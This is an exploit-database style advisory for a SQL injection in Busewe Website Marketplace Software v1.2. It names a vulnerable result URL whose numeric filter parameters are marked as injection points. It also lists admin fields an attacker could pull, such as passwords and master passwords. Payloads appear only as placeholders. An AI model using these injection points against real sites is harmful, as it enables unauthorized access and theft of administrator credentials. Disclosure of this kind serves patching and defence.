25 lines
No EOL
771 B
Text
25 lines
No EOL
771 B
Text
# # # # #
|
|
# Exploit Title: Busewe - Website Marketplace Software v1.2 - SQL Injection
|
|
# Google Dork: N/A
|
|
# Date: 09.03.2017
|
|
# Vendor Homepage: https://www.ncrypted.net/
|
|
# Software: https://www.ncrypted.net/busewe
|
|
# Demo: http://demo.ncryptedprojects.com/busewe/
|
|
# Version: 1.2
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/result?sort=desc&format=private&status=completed&age_min=[SQL]&age_max=[SQL]&revenue_min=[SQL]&revenue_max=[SQL]&profit_min=[SQL]&profit_max=[SQL]
|
|
# admin :id
|
|
# admin :username
|
|
# admin :password
|
|
# admin :masterPassword
|
|
# admin :email
|
|
# admin :role
|
|
# admin :permissions
|
|
# Etc..
|
|
# # # # # |